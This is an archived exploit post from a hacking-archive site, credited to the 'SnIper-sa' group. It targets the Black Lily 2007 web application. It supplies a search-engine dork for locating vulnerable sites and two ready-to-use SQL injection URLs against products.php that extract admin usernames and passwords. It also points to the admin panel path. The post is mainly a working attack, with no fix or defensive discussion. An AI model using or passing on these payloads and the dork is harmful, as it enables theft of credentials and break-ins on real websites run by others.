AOH :: HP Unsorted B :: TB13465.HTM

Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability



Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability
Black Lily 2007 (products.php class) Remote SQL Injection Vulnerability



#######################SnIper-sa.com################################
#                                                                  #
#  SSSSS      nnn        nn   ii  ppppppp  eeeeeeeee   rrrrr       #
# ss          nn nn      nn   ii  pp    p  ee          rr   rr     #
#s            nn  nn     nn   ii  pp    p  ee          rr     r    #
# ss          nn   nn    nn   ii  ppppppp  ee          rr   rr     #
#   sssss     nn    nn   nn   ii  pp       eeeeee      rrrr        #
#        ss   nn     nn  nn   ii  pp       ee          rrrr        #
#          s  nn      nn nn   ii  pp       ee          rr  rr      #
#        ss   nn        nnn   ii  pp       ee          rr   rr     #
#   sssss     nn        nnn   ii  pp       eeeeeeeeee  rr     rr   #
#                                                                  #
#####################VerY-SecReT####################################
####################################

 found by :
               VerY SecReT
###########
HomePage : WwW.SnIpEr-Sa.Com
##################

 Dork :  "Powered By The Black Lily 2007"
####################################

EXPLOIT:
http://victim.com/ar/products.php?class=-1%20union%20select%201,2,password,4,username%20from%20admin/*

 or

http://victim.com/en/products.php?class=-1%20union%20select%201,2,3,password,username%20from%20admin/*

########################################

Admin Panel is in http://victim.com/xx/admin/

#####################################

 S.GreetZ: sniper-sa.com & sniper-sa & Rafoo
#############################
thanx :  shoot3r , Devil-X ,ReMOTeR , and all sniper members

##############

contact-mail : SecReT@SecuRitY.Com.Sa


The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.